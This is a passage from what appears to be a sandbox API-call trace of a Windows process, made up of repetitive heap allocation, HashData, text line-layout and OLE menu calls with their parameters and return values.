hHeap=0x5e0000) returned 1 [0162.149] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.149] HashData (in: pbData=0x62b2c0, cbData=0x1, pbHash=0x198560, cbHash=0x2 | out: pbHash=0x198560) returned 0x0 [0162.149] HashData (in: pbData=0x19855c, cbData=0x4, pbHash=0x198568, cbHash=0x2 | out: pbHash=0x198568) returned 0x0 [0162.149] HashData (in: pbData=0x62b2c4, cbData=0xc, pbHash=0x198564, cbHash=0x2 | out: pbHash=0x198564) returned 0x0 [0162.149] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.149] LsSetDoc () returned 0x0 [0162.149] LsCreateLine () returned 0x0 [0162.149] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.149] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.149] LsdnFinishRegular () returned 0x0 [0162.150] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.150] LsdnFinishRegular () returned 0x0 [0162.150] LsDisplayLine () returned 0x0 [0162.150] IOleInPlaceFrame:SetMenu (This=0xd90660, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0162.150] IOleInPlaceFrame:SetMenu (This=0xd90640, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x0) returned 0x0 [0162.151] GetSysColor (nIndex=8) returned 0x0 [0162.151] GetSysColor (nIndex=8) returned 0x0 [0162.151] LsDestroyLine () returned 0x0 [0162.151] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa380) returned 0x0 [0162.152] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6c80 [0162.152] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.157] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7778 [0162.157] HashData (in: pbData=0x62b2c4, cbData=0x4, pbHash=0x62b2c8, cbHash=0x2 | out: pbHash=0x62b2c8) returned 0x0 [0162.157] HashData (in: pbData=0x6d7778, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.157] HashData (in: pbData=0x6d777a, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.157] HashData (in: pbData=0x6d777c, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.157] HashData (in: pbData=0x6d7784, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.157] HashData (in: pbData=0x6d778c, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.157] HashData (in: pbData=0x6d7794, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.157] HashData (in: pbData=0x6d7796, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.157] HashData (in: pbData=0x6d7798, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.157] HashData (in: pbData=0x6d77a0, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.157] HashData (in: pbData=0x197bec, cbData=0x4, pbHash=0x197bd8, cbHash=0x2 | out: pbHash=0x197bd8) returned 0x0 [0162.157] HashData (in: pbData=0x6d77ac, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.157] HashData (in: pbData=0x6d77b4, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.157] HashData (in: pbData=0x6d77c0, cbData=0x4, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.157] HashData (in: pbData=0x6d77c4, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.157] HashData (in: pbData=0x6d77cc, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.158] HashData (in: pbData=0x6d77d8, cbData=0x4, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.158] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7778 | out: hHeap=0x5e0000) returned 1 [0162.158] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.158] HashData (in: pbData=0x9ee6c80, cbData=0x1, pbHash=0x197bdc, cbHash=0x2 | out: pbHash=0x197bdc) returned 0x0 [0162.158] HashData (in: pbData=0x197bf4, cbData=0x4, pbHash=0x197bdc, cbHash=0x2 | out: pbHash=0x197bdc) returned 0x0 [0162.158] HashData (in: pbData=0x9ee6c84, cbData=0x4, pbHash=0x197bf8, cbHash=0x2 | out: pbHash=0x197bf8) returned 0x0 [0162.158] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6c80 | out: hHeap=0x5e0000) returned 1 [0162.158] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6c80 [0162.158] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.158] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7858 [0162.158] HashData (in: pbData=0x62b2c4, cbData=0x4, pbHash=0x62b2c8, cbHash=0x2 | out: pbHash=0x62b2c8) returned 0x0 [0162.158] HashData (in: pbData=0x6d7858, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.158] HashData (in: pbData=0x6d785a, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.158] HashData (in: pbData=0x6d785c, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.158] HashData (in: pbData=0x6d7864, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.158] HashData (in: pbData=0x6d786c, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.158] HashData (in: pbData=0x6d7874, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.159] HashData (in: pbData=0x6d7876, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.159] HashData (in: pbData=0x6d7878, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.159] HashData (in: pbData=0x6d7880, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.159] HashData (in: pbData=0x197bec, cbData=0x4, pbHash=0x197bd8, cbHash=0x2 | out: pbHash=0x197bd8) returned 0x0 [0162.159] HashData (in: pbData=0x6d788c, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.159] HashData (in: pbData=0x6d7894, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.159] HashData (in: pbData=0x6d78a0, cbData=0x4, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.159] HashData (in: pbData=0x6d78a4, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.159] HashData (in: pbData=0x6d78ac, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.159] HashData (in: pbData=0x6d78b8, cbData=0x4, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.159] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7858 | out: hHeap=0x5e0000) returned 1 [0162.159] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.159] HashData (in: pbData=0x9ee6c80, cbData=0x1, pbHash=0x197bdc, cbHash=0x2 | out: pbHash=0x197bdc) returned 0x0 [0162.159] HashData (in: pbData=0x197bf4, cbData=0x4, pbHash=0x197bdc, cbHash=0x2 | out: pbHash=0x197bdc) returned 0x0 [0162.159] HashData (in: pbData=0x9ee6c84, cbData=0x4, pbHash=0x197bf8, cbHash=0x2 | out: pbHash=0x197bf8) returned 0x0 [0162.159] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6c80 | out: hHeap=0x5e0000) returned 1 [0162.159] GetFocus () returned 0x0 [0162.159] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x197a37) returned 0 [0162.160] GetFocus () returned 0x0 [0162.160] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x197a43) returned 0 [0162.160] GetSysColor (nIndex=15) returned 0xf0f0f0 [0162.161] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7778 [0162.161] _CIsqrt () returned 0x407b027f [0162.161] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0162.161] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.161] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.161] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0162.161] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x54) returned 0x6dd958 [0162.161] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.161] HashData (in: pbData=0xd94930, cbData=0x28, pbHash=0x197404, cbHash=0x4 | out: pbHash=0x197404) returned 0x0 [0162.162] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.162] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.167] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.180] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dd958 | out: hHeap=0x5e0000) returned 1 [0162.180] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6c80 [0162.180] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.180] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d78c8 [0162.180] HashData (in: pbData=0x62b2c4, cbData=0x4, pbHash=0x62b2c8, cbHash=0x2 | out: pbHash=0x62b2c8) returned 0x0 [0162.180] HashData (in: pbData=0x6d78c8, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.180] HashData (in: pbData=0x6d78ca, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.180] HashData (in: pbData=0x6d78cc, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.180] HashData (in: pbData=0x6d78d4, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.180] HashData (in: pbData=0x6d78dc, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.180] HashData (in: pbData=0x6d78e4, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.180] HashData (in: pbData=0x6d78e6, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.180] HashData (in: pbData=0x6d78e8, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.180] HashData (in: pbData=0x6d78f0, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.180] HashData (in: pbData=0x197bec, cbData=0x4, pbHash=0x197bd8, cbHash=0x2 | out: pbHash=0x197bd8) returned 0x0 [0162.181] HashData (in: pbData=0x6d78fc, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.181] HashData (in: pbData=0x6d7904, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.181] HashData (in: pbData=0x6d7910, cbData=0x4, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.181] HashData (in: pbData=0x6d7914, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.181] HashData (in: pbData=0x6d791c, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.181] HashData (in: pbData=0x6d7928, cbData=0x4, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.181] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d78c8 | out: hHeap=0x5e0000) returned 1 [0162.181] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.181] HashData (in: pbData=0x9ee6c80, cbData=0x1, pbHash=0x197bdc, cbHash=0x2 | out: pbHash=0x197bdc) returned 0x0 [0162.181] HashData (in: pbData=0x197bf4, cbData=0x4, pbHash=0x197bdc, cbHash=0x2 | out: pbHash=0x197bdc) returned 0x0 [0162.181] HashData (in: pbData=0x9ee6c84, cbData=0x4, pbHash=0x197bf8, cbHash=0x2 | out: pbHash=0x197bf8) returned 0x0 [0162.181] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6c80 | out: hHeap=0x5e0000) returned 1 [0162.181] GetFocus () returned 0x0 [0162.181] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x197ba7) returned 0 [0162.183] GetFocus () returned 0x0 [0162.183] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x197b63) returned 0 [0162.183] GetFocus () returned 0x0 [0162.183] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x197b6f) returned 0 [0162.183] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0162.183] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0162.183] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0162.183] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0162.183] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0162.183] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0162.185] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b2c0 [0162.185] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.185] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0162.186] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0162.186] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0162.186] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0162.186] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0162.186] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0162.186] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x62b668 [0162.187] GetSysColor (nIndex=15) returned 0xf0f0f0 [0162.187] GetSysColor (nIndex=15) returned 0xf0f0f0 [0162.188] GetSysColor (nIndex=15) returned 0xf0f0f0 [0162.188] GetSysColor (nIndex=15) returned 0xf0f0f0 [0162.189] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.189] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x690658 [0162.190] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b2c0 | out: hHeap=0x5e0000) returned 1 [0162.192] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62b668 | out: hHeap=0x5e0000) returned 1 [0162.192] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x690658 | out: hHeap=0x5e0000) returned 1 [0162.192] LsSetDoc () returned 0x0 [0162.192] LsCreateLine () returned 0x0 [0162.193] LsDisplayLine () returned 0x0 [0162.341] LsDestroyLine () returned 0x0 [0162.341] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6d80 [0162.341] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x690658 [0162.341] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d77e8 [0162.341] HashData (in: pbData=0x69065c, cbData=0x4, pbHash=0x690660, cbHash=0x2 | out: pbHash=0x690660) returned 0x0 [0162.341] HashData (in: pbData=0x6d77e8, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.341] HashData (in: pbData=0x6d77ea, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.341] HashData (in: pbData=0x6d77ec, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.341] HashData (in: pbData=0x6d77f4, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.341] HashData (in: pbData=0x6d77fc, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.341] HashData (in: pbData=0x6d7804, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.341] HashData (in: pbData=0x6d7806, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.342] HashData (in: pbData=0x6d7808, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.342] HashData (in: pbData=0x6d7810, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.342] HashData (in: pbData=0x197bec, cbData=0x4, pbHash=0x197bd8, cbHash=0x2 | out: pbHash=0x197bd8) returned 0x0 [0162.342] HashData (in: pbData=0x6d781c, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.342] HashData (in: pbData=0x6d7824, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.342] HashData (in: pbData=0x6d7830, cbData=0x4, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.342] HashData (in: pbData=0x6d7834, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.342] HashData (in: pbData=0x6d783c, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.342] HashData (in: pbData=0x6d7848, cbData=0x4, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.342] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d77e8 | out: hHeap=0x5e0000) returned 1 [0162.342] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x690658 | out: hHeap=0x5e0000) returned 1 [0162.342] HashData (in: pbData=0x9ee6d80, cbData=0x1, pbHash=0x197bdc, cbHash=0x2 | out: pbHash=0x197bdc) returned 0x0 [0162.342] HashData (in: pbData=0x197bf4, cbData=0x4, pbHash=0x197bdc, cbHash=0x2 | out: pbHash=0x197bdc) returned 0x0 [0162.342] HashData (in: pbData=0x9ee6d84, cbData=0x4, pbHash=0x197bf8, cbHash=0x2 | out: pbHash=0x197bf8) returned 0x0 [0162.342] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d80 | out: hHeap=0x5e0000) returned 1 [0162.342] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6cc0 [0162.342] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x690658 [0162.343] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d77e8 [0162.343] HashData (in: pbData=0x69065c, cbData=0x4, pbHash=0x690660, cbHash=0x2 | out: pbHash=0x690660) returned 0x0 [0162.343] HashData (in: pbData=0x6d77e8, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.343] HashData (in: pbData=0x6d77ea, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.343] HashData (in: pbData=0x6d77ec, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.343] HashData (in: pbData=0x6d77f4, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.343] HashData (in: pbData=0x6d77fc, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.343] HashData (in: pbData=0x6d7804, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.343] HashData (in: pbData=0x6d7806, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.343] HashData (in: pbData=0x6d7808, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.343] HashData (in: pbData=0x6d7810, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.343] HashData (in: pbData=0x197bec, cbData=0x4, pbHash=0x197bd8, cbHash=0x2 | out: pbHash=0x197bd8) returned 0x0 [0162.343] HashData (in: pbData=0x6d781c, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.343] HashData (in: pbData=0x6d7824, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.343] HashData (in: pbData=0x6d7830, cbData=0x4, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.343] HashData (in: pbData=0x6d7834, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.343] HashData (in: pbData=0x6d783c, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.343] HashData (in: pbData=0x6d7848, cbData=0x4, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.344] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d77e8 | out: hHeap=0x5e0000) returned 1 [0162.344] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x690658 | out: hHeap=0x5e0000) returned 1 [0162.344] HashData (in: pbData=0x9ee6cc0, cbData=0x1, pbHash=0x197bdc, cbHash=0x2 | out: pbHash=0x197bdc) returned 0x0 [0162.344] HashData (in: pbData=0x197bf4, cbData=0x4, pbHash=0x197bdc, cbHash=0x2 | out: pbHash=0x197bdc) returned 0x0 [0162.344] HashData (in: pbData=0x9ee6cc4, cbData=0x4, pbHash=0x197bf8, cbHash=0x2 | out: pbHash=0x197bf8) returned 0x0 [0162.344] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6cc0 | out: hHeap=0x5e0000) returned 1 [0162.344] GetSysColor (nIndex=15) returned 0xf0f0f0 [0162.346] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7778 | out: hHeap=0x5e0000) returned 1 [0162.346] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7af8 [0162.346] _CIsqrt () returned 0x407b027f [0162.346] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6c80 [0162.346] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.347] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.347] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6c80 | out: hHeap=0x5e0000) returned 1 [0162.347] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x54) returned 0x6dd838 [0162.347] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0162.347] HashData (in: pbData=0xd949c0, cbData=0x28, pbHash=0x197404, cbHash=0x4 | out: pbHash=0x197404) returned 0x0 [0162.370] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dd838 | out: hHeap=0x5e0000) returned 1 [0162.370] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6c80 [0162.370] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x690658 [0162.370] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7d28 [0162.370] HashData (in: pbData=0x69065c, cbData=0x4, pbHash=0x690660, cbHash=0x2 | out: pbHash=0x690660) returned 0x0 [0162.370] HashData (in: pbData=0x6d7d28, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.370] HashData (in: pbData=0x6d7d2a, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.370] HashData (in: pbData=0x6d7d2c, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.370] HashData (in: pbData=0x6d7d34, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.370] HashData (in: pbData=0x6d7d3c, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.370] HashData (in: pbData=0x6d7d44, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.371] HashData (in: pbData=0x6d7d46, cbData=0x2, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.371] HashData (in: pbData=0x6d7d48, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.371] HashData (in: pbData=0x6d7d50, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.371] HashData (in: pbData=0x197bec, cbData=0x4, pbHash=0x197bd8, cbHash=0x2 | out: pbHash=0x197bd8) returned 0x0 [0162.371] HashData (in: pbData=0x6d7d5c, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.371] HashData (in: pbData=0x6d7d64, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.371] HashData (in: pbData=0x6d7d70, cbData=0x4, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.371] HashData (in: pbData=0x6d7d74, cbData=0x8, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.371] HashData (in: pbData=0x6d7d7c, cbData=0x8, pbHash=0x197bc0, cbHash=0x2 | out: pbHash=0x197bc0) returned 0x0 [0162.371] HashData (in: pbData=0x6d7d88, cbData=0x4, pbHash=0x197bd4, cbHash=0x2 | out: pbHash=0x197bd4) returned 0x0 [0162.371] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7d28 | out: hHeap=0x5e0000) returned 1 [0162.371] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x690658 | out: hHeap=0x5e0000) returned 1 [0162.371] HashData (in: pbData=0x9ee6c80, cbData=0x1, pbHash=0x197bdc, cbHash=0x2 | out: pbHash=0x197bdc) returned 0x0 [0162.371] HashData (in: pbData=0x197bf4, cbData=0x4, pbHash=0x197bdc, cbHash=0x2 | out: pbHash=0x197bdc) returned 0x0 [0162.371] HashData (in: pbData=0x9ee6c84, cbData=0x4, pbHash=0x197bf8, cbHash=0x2 | out: pbHash=0x197bf8) returned 0x0 [0162.371] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6c80 | out: hHeap=0x5e0000) returned 1 [0162.371] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0162.371] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0162.371] MulDiv (nNumber=1, nNumerator=0, 